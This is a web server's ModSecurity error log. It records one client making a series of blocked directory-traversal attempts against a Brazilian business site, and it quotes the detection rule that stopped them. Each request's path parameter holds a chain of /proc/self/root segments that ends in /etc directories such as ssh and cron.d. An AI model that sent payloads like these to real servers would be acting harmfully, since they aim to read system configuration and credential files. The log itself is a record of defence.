[Mon Mar 16 17:38:11.390181 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:48622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqM9SswJuvopo3lOh31QAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:38:12.714485 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:43658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqNNSswJuvopo3lOh31gAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:30.930878 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:43660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqRqTCbgAP5jq5TehFHQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:32.252844 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:54546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqSP9ocpUE4ed4uDwMKgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:33.511629 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:54550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqSVajLEzk2WiQ-10rqAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:37.027777 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:54564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqTf9ocpUE4ed4uDwMMQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:38.355597 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:56646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqTqQpVkWug9HeOt9NwQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:39.542013 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:56650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqT_9ocpUE4ed4uDwMNAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:40.799280 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:56652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqUP9ocpUE4ed4uDwMNQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:41.935793 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:56666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqUdSswJuvopo3lOh33wAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:43.226431 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:56678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqU1ajLEzk2WiQ-10rrQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:44.431084 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:56690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqVLABkC4fWIHEf8EObgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:45.759787 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:56702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqVbysWC90G-1nBrBdwQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:46.925253 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:56710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqVqTCbgAP5jq5TehFHgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:49.300496 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:51692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqWdSswJuvopo3lOh35gAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:50.634746 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.241.46:51700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqWkr9dMAiw-8KANNiuQAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:51.819106 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:51702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqW6TCbgAP5jq5TehFIQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:53.076096 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:51714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqXbysWC90G-1nBrBdwwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:54.232669 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:51730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqXrysWC90G-1nBrBdxAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:55.551358 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:51732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqX6TCbgAP5jq5TehFIgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:57.466981 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:51742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqYEr9dMAiw-8KANNiwAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
